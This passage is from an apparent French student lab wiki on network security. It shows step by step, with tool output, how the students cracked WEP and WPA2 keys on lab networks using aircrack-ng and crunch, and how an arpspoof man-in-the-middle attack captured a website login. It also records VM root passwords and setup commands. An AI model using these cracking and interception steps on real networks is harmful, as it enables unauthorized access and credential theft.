Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53934</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53934"/>
				<updated>2020-11-20T08:50:45Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Réception d'un message */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
